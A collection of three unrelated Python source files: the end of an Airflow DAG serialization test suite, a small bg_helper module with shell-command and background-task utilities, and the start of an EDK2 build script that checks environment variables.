datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
def test_serialize_event_handler(self):
from airflow.operators.dummy import DummyOperator
from airflow.contrib.jobs.event_handlers import StartEventHandler, AIFlowHandler
from notification_service.base_notification import BaseEvent
from airflow.executors.scheduling_action import SchedulingAction
# event = BaseEvent(key='k', value='v')
# op = DummyOperator(task_id='dummy', event_handler=StartEventHandler())
# encoded_op = SerializedBaseOperator.serialize_operator(op)
# deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
# event_handler = deserialized_op.get_events_handler()
# assert type(event_handler) == StartEventHandler
# assert event_handler.handle_event(event, None)[0] == SchedulingAction.START
#
# op = DummyOperator(task_id='dummy')
# encoded_op = SerializedBaseOperator.serialize_operator(op)
# deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
# event_handler = deserialized_op.get_events_handler()
# assert event_handler is None
configs = '[{"__af_object_type__": "jsonable", "__class__": "MetConfig", "__module__": "ai_flow.graph.edge", "action": "START", "condition": "NECESSARY", "event_key": "key_1", "event_type": "UNDEFINED", "event_value": "value_1", "life": "ONCE", "namespace": "default", "value_condition": "EQUAL"}]'
op = DummyOperator(task_id='dummy', event_handler=AIFlowHandler(config=configs))
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_events_handler()
assert type(event_handler) == AIFlowHandler
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
__init__.py
|
import threading
import sys
import traceback
import socket
import time
import subprocess
import uuid
import fs_helper as fh
from functools import partial
from os import remove
logger = fh.get_logger(__name__)
def run(cmd, debug=False, timeout=None, exception=False, show=False):
"""Run a shell command and return the exit status
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.call
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if non-zero exit status or TimeoutExpired
- show: if True, show the command before executing
"""
ret_code = 1
if show:
print('\n$ {}'.format(cmd))
try:
# Annoying that you can't just use an io.StringIO() instance for error_buf
error_buffer_path = '/tmp/error-buffer-{}.txt'.format(str(uuid.uuid4()))
with open(error_buffer_path, 'w') as error_buf:
if debug:
breakpoint()
ret_code = subprocess.call(cmd, stderr=error_buf, timeout=timeout, shell=True)
if exception:
with open(error_buffer_path, 'r') as fp:
text = fp.read()
if text != '':
# This section might grow if more commands write non-errors to stderr
if 'git' in cmd:
if 'fatal:' in text:
raise Exception(text.strip())
else:
raise Exception(text.strip())
remove(error_buffer_path)
except subprocess.TimeoutExpired as e:
if exception:
output = 'Timeout of {} reached when running: {}'.format(timeout, cmd)
raise Exception(output.strip())
return ret_code
def run_output(cmd, debug=False, timeout=None, exception=False, show=False):
"""Run a shell command and return output or error
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.check_output
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if CalledProcessError or TimeoutExpired
- show: if True, show the command before executing
"""
if show:
print('\n$ {}'.format(cmd))
try:
if debug:
breakpoint()
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True, timeout=timeout)
except subprocess.CalledProcessError as e:
output = e.output
if exception:
from pprint import pprint
pprint(sys.exc_info())
raise Exception(output.decode('utf-8').strip())
except subprocess.TimeoutExpired:
output = 'Timeout of {} reached when running: {}'.format(timeout, cmd).encode('utf-8')
if exception:
raise Exception(output.decode('utf-8').strip())
if exception:
output = output.decode('utf-8').strip()
if 'git' in cmd and 'fatal:' in output:
raise Exception(output)
output = output.encode('utf-8')
return output.decode('utf-8').strip()
def run_or_die(cmd, debug=False, timeout=None, exception=True, show=False):
"""Run a shell command; if non-success, raise Exception or exit the system
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.call
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if return code of cmd is non-zero
- otherwise, do system exit if return code of cmd is non-zero
- show: if True, show the command before executing
"""
try:
ret_code = run(cmd, debug=debug, timeout=timeout, exception=exception, show=show)
except:
if exception:
raise
else:
sys.exit(1)
else:
if ret_code != 0:
if exception:
raise Exception
else:
sys.exit(ret_code)
def get_logger_filenames(logger):
"""Return the filenames of a logger object"""
return [
handler.baseFilename
for handler in logger.handlers
if hasattr(handler, 'baseFilename')
]
def call_func(func, *args, **kwargs):
"""Call a func with arbitrary args/kwargs and capture uncaught exceptions
The following kwargs will be popped and used internally:
- logger: logger object to use
- verbose: if True (default), print line separator & tracebacks when caught
The returned dict will always have at least the following keys:
- `func_name`
- `args`
- `kwargs`
- `status` (ok/error)
If the function call was successful, there will also be a `value` key. If
there was an uncaught exception, the following additional keys will be
provided in the return dict
- `error_type`
- `error_value`
- `fqdn`
- `func_doc`
- `func_module`
- `time_epoch`
- `time_string`
- `traceback_string`
"""
_logger = kwargs.pop('logger', logger)
verbose = kwargs.pop('verbose', True)
try:
_logfile = get_logger_filenames(_logger)[0]
except IndexError:
_logfile = None
info = {
'func_name': getattr(func, '__name__', repr(type(func))),
'args': repr(args),
'kwargs': repr(kwargs),
}
try:
value = func(*args, **kwargs)
info.update({
'status': 'ok',
'value': value
})
except:
etype, evalue, tb = sys.exc_info()
epoch = time.time()
info.update({
'status': 'error',
'traceback_string': traceback.format_exc(),
'error_type': repr(etype),
'error_value': repr(evalue),
'func_doc': getattr(func, '__doc__', ''),
'func_module': getattr(func, '__module__', ''),
'fqdn': socket.getfqdn(),
'time_epoch': epoch,
'time_string': time.strftime(
'%Y_%m%d-%a-%H%M%S', time.localtime(epoch)
)
})
if verbose:
print('=' * 70)
_logger.error('func={} args={} kwargs={}'.format(
info['func_name'],
info['args'],
info['kwargs'],
))
if verbose:
print(info['traceback_string'])
if _logfile:
with open(_logfile, 'a') as fp:
fp.write(info['traceback_string'])
return info
class SimpleBackgroundTask(object):
"""Run a single command in a background thread and log any exceptions
You can pass a callable object, or a string representing a shell command
- if passing a callable, you may also pass in the args and kwargs
- since the callable will be executed by the `call_func` function,
the `logger` and `verbose` keyword arguments (if passed in) will be
used by `call_func`
"""
def __init__(self, func, *args, **kwargs):
"""
- func: callable object or string
"""
if not callable(func):
func = partial(run, func)
args = ()
kwargs = {}
self._func = func
self._args = args
self._kwargs = kwargs
# Setup the daemonized thread and start running it
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
def run(self):
call_func(self._func, *self._args, **self._kwargs)
from bg_helper import tools
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2014, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = os.path.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
